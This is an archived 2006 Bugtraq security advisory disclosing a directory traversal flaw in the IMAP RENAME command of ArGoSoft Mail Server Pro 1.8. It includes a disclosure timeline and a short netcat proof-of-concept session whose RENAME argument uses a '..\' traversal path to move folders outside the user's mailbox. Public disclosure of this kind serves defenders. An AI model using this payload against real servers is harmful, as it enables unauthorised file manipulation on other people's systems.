| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 24 Feb 2006 03:17:22 +0300 From: NSA Group <vulnerability@...g.ru> To: bugtraq@...urityfocus.com Subject: NSA Group Security Advisory NSAG-№200-24.02.2006 Vulnerability ArGoSoft Mail Server Pro IMAP Advisory: NSAG-№200-24.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: ArGoSoft Mail Server Pro 1.8 IMAP Site of manufacturer: www.argosoft.com The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 14/02/2006 - Answer of the manufacturer is absent. 14/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/878.html Risk: Hide Description: Vulnerability exists because of insufficient check of entrance data of variable RENAME. Influence: Removed user, is accessible to move files, to an any place on a disk. Exploit: M: \> nc.exe 192.168.1.1 143 * OK IMAP Module of ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.8.1) 0001 LOGIN "testuser" "test" 0001 OK LOGIN successful 000P CREATE "testfile" 000P OK Folder created 000G RENAME "testfile" "...\..\..\hackuser\hackfolder" 000G OK RENAME completed More information: http://www.nsag.ru/vuln/878.html ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.
Powered by blists - more mailing lists